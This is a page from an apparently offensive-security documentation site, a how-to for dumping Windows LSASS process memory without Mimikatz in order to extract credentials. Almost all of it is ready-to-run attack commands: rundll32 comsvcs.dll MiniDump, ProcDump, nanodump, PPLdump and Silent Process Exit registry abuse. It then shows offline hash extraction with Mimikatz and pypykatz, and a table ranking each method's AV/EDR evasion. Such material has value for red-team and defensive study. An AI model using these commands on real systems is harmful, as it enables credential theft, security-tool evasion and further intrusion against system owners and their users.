> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# LSASS Dump (Without Mimikatz)

> Dumping LSASS process memory using built-in tools and LOLBINs: comsvcs.dll, ProcDump, Task Manager, and more.

## Overview

LSASS (Local Security Authority Subsystem Service) holds credentials in memory. When Mimikatz is blocked by AV/EDR, use these alternatives to dump LSASS and extract credentials offline.

***

## comsvcs.dll (LOLBIN)

Built-in Windows DLL. No download needed.

### Find LSASS PID

```cmd theme={"dark"}
tasklist | findstr lsass
```

```powershell theme={"dark"}
Get-Process lsass | Select Id
```

### Dump

```cmd theme={"dark"}
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full
```

```powershell theme={"dark"}
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full
```

<Note>
  Requires SeDebugPrivilege. Run from elevated prompt.
</Note>

***

## ProcDump (Sysinternals)

Microsoft-signed binary — often whitelisted by AV.

```bash theme={"dark"}
# Download
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
```

### Dump

```cmd theme={"dark"}
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

### By PID

```cmd theme={"dark"}
procdump.exe -accepteula -ma <PID> lsass.dmp
```

***

## Task Manager (GUI)

If RDP access is available:

1. Open Task Manager
2. Details tab
3. Right-click `lsass.exe` → **Create dump file**
4. File saved to `C:\Users\%USERNAME%\AppData\Local\Temp\lsass.DMP`

***

## Direct Syscalls — nanodump

Avoids API hooking by using direct syscalls. Effective against EDR.

```bash theme={"dark"}
https://github.com/helpsystems/nanodump
```

```cmd theme={"dark"}
nanodump.exe -w lsass.dmp
```

***

## PPLdump (Protected Process Light)

If LSASS runs as PPL (Protected Process Light):

```bash theme={"dark"}
https://github.com/itm4n/PPLdump
```

```cmd theme={"dark"}
PPLdump.exe lsass.exe lsass.dmp
```

***

## Silent Process Exit (Abuse Windows Error Reporting)

Configure WER to dump LSASS on "exit":

```cmd theme={"dark"}
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v ReportingMode /t REG_DWORD /d 2
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v LocalDumpFolder /t REG_SZ /d "C:\Windows\Temp"
```

***

## Extract Credentials from Dump (Attacker)

### Mimikatz (Offline)

```
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

### pypykatz (Python — No Windows Needed)

```bash theme={"dark"}
pip3 install pypykatz
pypykatz lsa minidump lsass.dmp
```

### Extract Only NTLM Hashes

```bash theme={"dark"}
pypykatz lsa minidump lsass.dmp -o hashes.txt
```

***

## Quick Reference

| Method       | Needs Download | AV Evasion | Notes            |
| ------------ | -------------- | ---------- | ---------------- |
| comsvcs.dll  | No             | Medium     | Built-in LOLBIN  |
| ProcDump     | Yes            | High       | Microsoft-signed |
| Task Manager | No             | High       | GUI only (RDP)   |
| nanodump     | Yes            | Very High  | Direct syscalls  |
| PPLdump      | Yes            | High       | Bypasses PPL     |
